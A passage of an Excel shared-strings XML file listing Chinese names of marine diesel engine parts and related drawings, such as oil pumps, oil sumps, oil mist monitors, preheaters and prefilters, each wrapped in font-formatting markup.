    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油泵壳体总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油泵密封包</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油泵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>明细（增压器）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油泵柱塞和导套的生产控制</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油泵装备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油泵总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油槽</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油底壳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油底壳板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油底壳加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油底壳明细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油底壳</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>剖视图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油底壳图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油底壳装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油阀护罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油分离器壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油分配环毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油分配器环的密封</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油封盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油封盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油封环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油柜</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油柜压力系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油过滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油耗限位开关</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油和水测试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油冷却器盖铸造</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油冷却器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查和清洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油冷却器阳极</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油冷却器支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油冷却器总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油离心机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油密封盖总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油盘提升附加装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油品规格书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油气控制块详细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>粗加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油套定距环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油套端盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油套盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油套盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油套环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油位</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油位，位差及清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油位传感器安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油位传感器支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油位传感器支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油位传感器总成支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油位观察镜</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油雾监测器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油雾监测器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油雾监测器订货清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油雾监测器用管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油雾监测器支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油蓄压器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油压调节活塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油压调整阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油嘴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油嘴冷却系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油嘴冷却油温控阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>右，圆拱工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>右手压缩弹簧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>右舷叶片座机加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>右旋螺旋桨叶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>右旋压缩弹簧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>右旋叶片法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预备泵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖的布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预滑油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预滑油泵起动器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预滑油警报，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>LAL25</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预加工车间</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预滤器，船用柴油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预滤器，喷管冷却油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预滤器，润滑油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预滤器，重油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预滤器壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预滤器箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预滤器元件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预燃室</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预热</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预热泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预热单元布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预热阀控制空气</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预热器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预热器出口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预热器高温管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预热器进口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预热器支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预润滑泵布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预润滑泵密封套件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预制端子箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预转子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆垫</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆垫</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆盖</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
